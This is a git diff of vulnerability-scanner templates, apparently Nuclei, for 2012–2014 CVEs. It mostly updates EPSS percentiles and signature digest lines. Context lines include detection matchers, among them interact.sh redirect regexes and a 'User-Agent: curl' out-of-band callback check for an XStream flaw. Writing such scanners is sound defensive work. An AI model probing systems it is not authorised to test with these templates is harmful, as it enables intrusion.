100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.01204 - epss-percentile: 0.83699 + epss-percentile: 0.83709 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a0046304402202545b740f5b12cdb25eb34ca93fb15a74cf233b2f704d5ea821e687e089e020402206da42316a9cf1f983c632f0e2f7825aff23adca32b620860b97971599ec62825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202545b740f5b12cdb25eb34ca93fb15a74cf233b2f704d5ea821e687e089e020402206da42316a9cf1f983c632f0e2f7825aff23adca32b620860b97971599ec62825:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index f0e06ffdca..1712ad341f 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-1965 cwe-id: CWE-94 epss-score: 0.00813 - epss-percentile: 0.79907 + epss-percentile: 0.79914 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cca5d265d46b27b72bdb28c439af4e73cfac7bc5e164a1fa57329ec286028dd7022100e3a072e5741f2036f8f4643d62a450e5c08eadf5fa9bb88df729c2759637392a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cca5d265d46b27b72bdb28c439af4e73cfac7bc5e164a1fa57329ec286028dd7022100e3a072e5741f2036f8f4643d62a450e5c08eadf5fa9bb88df729c2759637392a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 74ab34cea1..af4194946b 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59769 + epss-percentile: 0.5979 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202dd35e27424c8304819cf60b83531399076e2c6e376b27842fe8bf126a88f31502205d62ae293b0d2adef27c88e92a1daa70ce07f067664948b3221c27a5d26724bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202dd35e27424c8304819cf60b83531399076e2c6e376b27842fe8bf126a88f31502205d62ae293b0d2adef27c88e92a1daa70ce07f067664948b3221c27a5d26724bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 754034d703..d679e60b0b 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-2621 cwe-id: CWE-601 epss-score: 0.03563 - epss-percentile: 0.90554 + epss-percentile: 0.9056 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -40,4 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402203a4df2ad603574089a0f19e9e566bd6f8cc78c3bb5533411bf5f82581f96aa3202207fd3d9bc5fb9304d92685eb4e62c5bc3878c5a281b69ef261cb336083820f103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203a4df2ad603574089a0f19e9e566bd6f8cc78c3bb5533411bf5f82581f96aa3202207fd3d9bc5fb9304d92685eb4e62c5bc3878c5a281b69ef261cb336083820f103:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 30e7809652..aae95ee4dc 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71709 + epss-percentile: 0.71725 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e841cbf059cd3683fc4a061cd48a78c9ba598c03a276e6cae2c95a9a880dd8d0220068be74e8562c5892d291ba86e7823bb89a4d9717a9fb32cb06e4ac59ab042b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200e841cbf059cd3683fc4a061cd48a78c9ba598c03a276e6cae2c95a9a880dd8d0220068be74e8562c5892d291ba86e7823bb89a4d9717a9fb32cb06e4ac59ab042b8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 41ea185960..3124c34148 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.67719 - epss-percentile: 0.976 + epss-percentile: 0.97605 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 @@ -55,4 +55,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b27965f1c6960e6cde07013668e48f94d0414c0f975b2adc6e640e72afe85ee802205ca6065708e60f7f04a4977a56920e74f34470dddf825924aecfe90d82f7584e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b27965f1c6960e6cde07013668e48f94d0414c0f975b2adc6e640e72afe85ee802205ca6065708e60f7f04a4977a56920e74f34470dddf825924aecfe90d82f7584e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 858e3dd06c..f68a73a5f5 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83787 + epss-percentile: 0.83797 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201f6bf738385af338a6540db30bda54d5c08218c2fed32a494d8bab4d7aff6251022100949ec965966abad4a5adbede315003e6475eb22011f8c3413c823bbd927737a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201f6bf738385af338a6540db30bda54d5c08218c2fed32a494d8bab4d7aff6251022100949ec965966abad4a5adbede315003e6475eb22011f8c3413c823bbd927737a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 2cfa396870..731384aa38 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83787 + epss-percentile: 0.83797 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200b3064917c78aa540c17ace61ebda94cd91672acc412d37dc00e5d1f91e57e7f02207d8241009793402c3485f2d5a2363060f79725bb4ec2bf3452d458593bb71cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200b3064917c78aa540c17ace61ebda94cd91672acc412d37dc00e5d1f91e57e7f02207d8241009793402c3485f2d5a2363060f79725bb4ec2bf3452d458593bb71cbb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 6b2f5cde7b..3f4d084234 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2013-5528 cwe-id: CWE-22 epss-score: 0.00565 - epss-percentile: 0.75294 + epss-percentile: 0.75306 cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a58a36f298f6ebeeb9f2aa52af61ee742cb0782f659afeb3c959ae794a05b258022000f219b9d4e42eed9f45e2c7b19d505651dc3ee49e1d45ad9b2d9b9a1b0e6d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a58a36f298f6ebeeb9f2aa52af61ee742cb0782f659afeb3c959ae794a05b258022000f219b9d4e42eed9f45e2c7b19d505651dc3ee49e1d45ad9b2d9b9a1b0e6d55:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 640149bbcd..c517f0115d 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-5979 cwe-id: CWE-22 epss-score: 0.06969 - epss-percentile: 0.93207 + epss-percentile: 0.93215 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c9e5285052149efef63fd84bb93431587d4a7f187c8523d8b4c296bf4287d7b022100bf8d64518dcdf31dee7e9ea011d52c1e0e663004c652e9f9673ee119688beda3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203c9e5285052149efef63fd84bb93431587d4a7f187c8523d8b4c296bf4287d7b022100bf8d64518dcdf31dee7e9ea011d52c1e0e663004c652e9f9673ee119688beda3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 0e22991c47..bc1ab564c2 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.58728 + epss-percentile: 0.58747 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b13eb3e911bbb398381d0e256679f7844679221796fc0c4a4ac2f030948b75b02206739c815fe3b84edb4b15a8b885a4c68a5f4a66d32a221da60757f6f7acc4bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206b13eb3e911bbb398381d0e256679f7844679221796fc0c4a4ac2f030948b75b02206739c815fe3b84edb4b15a8b885a4c68a5f4a66d32a221da60757f6f7acc4bee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 4dc0755405..e3b636fc1a 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-7091 cwe-id: CWE-22 epss-score: 0.97375 - epss-percentile: 0.99876 + epss-percentile: 0.99877 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index a877bbc3f5..694d4e8a5c 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-7240 cwe-id: CWE-22 epss-score: 0.25635 - epss-percentile: 0.96162 + epss-percentile: 0.96166 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099f06c3020a8ac11211933efd31fb4a50e1a1d2476d7f8326a8614fc520e6a33022100b33f971c095e3ea221d93207943cb34a946b49a2ccb30225aa83995c097ade34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210099f06c3020a8ac11211933efd31fb4a50e1a1d2476d7f8326a8614fc520e6a33022100b33f971c095e3ea221d93207943cb34a946b49a2ccb30225aa83995c097ade34:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 4c3807bbee..0d4af18155 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-7285 cwe-id: CWE-78 epss-score: 0.33561 - epss-percentile: 0.96564 + epss-percentile: 0.96566 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -62,4 +62,5 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 490a004630440220513e273d913f600acb883b1cfd3675a0075a70e1d3e97849ef0b0f96ff93156102200519dec3d5fde780b1f77ad94d157accb998c1694a1134a15c8daf2c4952d01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220513e273d913f600acb883b1cfd3675a0075a70e1d3e97849ef0b0f96ff93156102200519dec3d5fde780b1f77ad94d157accb998c1694a1134a15c8daf2c4952d01c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index c57d9f80c6..b13c407e2b 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2014-10037 cwe-id: CWE-22 - epss-score: 0.18676 - epss-percentile: 0.95659 + epss-score: 0.14101 + epss-percentile: 0.95081 cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202fcde907b6d5e20daca5df31f5ef142c24bbcda051faa0dc58a179c4b89ca17a02207de0a2ffdf1786c9c8e1c25c6c1e68594bfd674a10d329fa8d02bd2be4012dfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202fcde907b6d5e20daca5df31f5ef142c24bbcda051faa0dc58a179c4b89ca17a02207de0a2ffdf1786c9c8e1c25c6c1e68594bfd674a10d329fa8d02bd2be4012dfb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 9bbb24e46c..4066db069b 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.87754 + epss-percentile: 0.87762 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff19d8aca2880fdfafcdb21a274f81572ea31c01735ad63b03ef00b239cb6317022100ec5301e71d16dbe8f05d486084f17531dfad631627b3ca605461f147ca627931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ff19d8aca2880fdfafcdb21a274f81572ea31c01735ad63b03ef00b239cb6317022100ec5301e71d16dbe8f05d486084f17531dfad631627b3ca605461f147ca627931:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 350b478119..bcd9c381c9 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2321 cwe-id: CWE-264 epss-score: 0.96364 - epss-percentile: 0.994 + epss-percentile: 0.99401 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009da9b2d622e372ea9515c924a659c4ae34897faf824847a4cd703071aef1c21d022100d8423a77d1f5e21ed250f28e7955a54df3d14ba2d91d9bf4468f303fd7de2f97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009da9b2d622e372ea9515c924a659c4ae34897faf824847a4cd703071aef1c21d022100d8423a77d1f5e21ed250f28e7955a54df3d14ba2d91d9bf4468f303fd7de2f97:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 20a187fbfe..4c632f8fcc 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-2323 cwe-id: CWE-89 epss-score: 0.9637 - epss-percentile: 0.99405 + epss-percentile: 0.99407 cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 0c8c76d727..7d400b959a 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.00723 - epss-percentile: 0.78537 + epss-percentile: 0.78549 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true @@ -62,4 +62,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207ac933da6c0d3eca92065946d4d0849090c204e2155de33f096a4b5ebd7aa6b4022038af7c7e13015552c21c7b5edf1d808a03010e9578378021f8a3700ab2b906bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207ac933da6c0d3eca92065946d4d0849090c204e2155de33f096a4b5ebd7aa6b4022038af7c7e13015552c21c7b5edf1d808a03010e9578378021f8a3700ab2b906bd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 7931f84f20..961e39568f 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2908 cwe-id: CWE-79 epss-score: 0.00594 - epss-percentile: 0.76005 + epss-percentile: 0.76017 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220397a7e198a6dbd7a9ba5f71f309235410db6456c3e9adc6754fac5707ed46e20022100d27aea6583034afffdf1f38bc3bcdd3f1b1979c5c706115d67e606cdd3d93ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220397a7e198a6dbd7a9ba5f71f309235410db6456c3e9adc6754fac5707ed46e20022100d27aea6583034afffdf1f38bc3bcdd3f1b1979c5c706115d67e606cdd3d93ee1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 1f309769d6..41991db252 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2962 cwe-id: CWE-22 epss-score: 0.95825 - epss-percentile: 0.99252 + epss-percentile: 0.99253 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203f557959ed531ecf156905d90b13e5f813eccd01e89affd2f2e11f0339ddaf53022100919b319b1ca36d906d242952a09bf9c515393dd24eac0dd7cc4e2f2e6ab28add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203f557959ed531ecf156905d90b13e5f813eccd01e89affd2f2e11f0339ddaf53022100919b319b1ca36d906d242952a09bf9c515393dd24eac0dd7cc4e2f2e6ab28add:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 87c1ba9a4c..1d23f6ad5e 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.55248 - epss-percentile: 0.97272 + epss-percentile: 0.97275 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -69,4 +69,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220160a798259a858f56cda050d8e575585353af3bf794cb9c220d85313ecb3f1fb02201107b325914581b1efc9e24aa78e45b5e4f04c8acaf5a215af0bfdf6b8563000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220160a798259a858f56cda050d8e575585353af3bf794cb9c220d85313ecb3f1fb02201107b325914581b1efc9e24aa78e45b5e4f04c8acaf5a215af0bfdf6b8563000:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index bcfce8b33c..4fe946a857 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.54379 - epss-percentile: 0.97252 + epss-percentile: 0.97255 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100a6ccef856bb04797a44d4fd90fda1e2ff80609458e5643b63091e964e18f76a50221009d184c16e0d5872442affb50eddcd599122b7f412f43b7337040976c9227df7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a6ccef856bb04797a44d4fd90fda1e2ff80609458e5643b63091e964e18f76a50221009d184c16e0d5872442affb50eddcd599122b7f412f43b7337040976c9227df7c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 0fcba0d59d..4d80bfdee4 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77583 + epss-percentile: 0.77595 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009fddb8105bc5579f8bcfdaadd546c44957842d4328fedb7f0d959a299df73443022100a20b86699413fd97427a8fc9a4de71011d2d3d1e96385822d9c164bc3664445d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009fddb8105bc5579f8bcfdaadd546c44957842d4328fedb7f0d959a299df73443022100a20b86699413fd97427a8fc9a4de71011d2d3d1e96385822d9c164bc3664445d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 69a4e6d290..c0d0de729f 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo epss-score: 0.96955 - epss-percentile: 0.99634 + epss-percentile: 0.99636 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220504930fb7dba3332c3c23d63fb2068f4e1f343ca96d299e854e02e7ed8470082022100a7d73c3c244b291c5999114d93a113f9d21e568f98677026820d3aaef5b25978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220504930fb7dba3332c3c23d63fb2068f4e1f343ca96d299e854e02e7ed8470082022100a7d73c3c244b291c5999114d93a113f9d21e568f98677026820d3aaef5b25978:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 3332448932..1a527cb7a7 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50203 + epss-percentile: 0.50224 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100baae4474166f1619a16c1b28fee6e36779c13d30d5c777457ee9e359620d43de022100ea5901af91dae12f74b2991d90b135ef94a10ff6c9ebb329850c232b6730d059:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100baae4474166f1619a16c1b28fee6e36779c13d30d5c777457ee9e359620d43de022100ea5901af91dae12f74b2991d90b135ef94a10ff6c9ebb329850c232b6730d059:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index b5f0f96462..ff2eb3a412 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48521 + epss-percentile: 0.48547 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d365553893c4004e98780e734be48d1c44b58a07edfcaf8a1543507f9384214022042ad8537d6141f422085a12dd73085121d3b6c63673ea7f893cb77469d692056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008d365553893c4004e98780e734be48d1c44b58a07edfcaf8a1543507f9384214022042ad8537d6141f422085a12dd73085121d3b6c63673ea7f893cb77469d692056:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index f74a2f7a7b..dc740a691c 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.50806 + epss-percentile: 0.50823 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022052d4f8b4694540c7868d2412adec91bf7c230efa5159d63d3e964a62e5daaf45022100c72777ce0876765a7b61208a8ff99a2f405d7ca2c73a6f69ddbb775f4ce279a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022052d4f8b4694540c7868d2412adec91bf7c230efa5159d63d3e964a62e5daaf45022100c72777ce0876765a7b61208a8ff99a2f405d7ca2c73a6f69ddbb775f4ce279a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index ba782ab46f..df48d8e247 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48521 + epss-percentile: 0.48547 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210083f967aed9aa31ee6568da51c0c74ed3f6a315dc7d27f2374a2a93407bd7c1690220010bb7a86ef81734ec4e5880540c115a35c1f816b73796fe506200b4746b9849:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 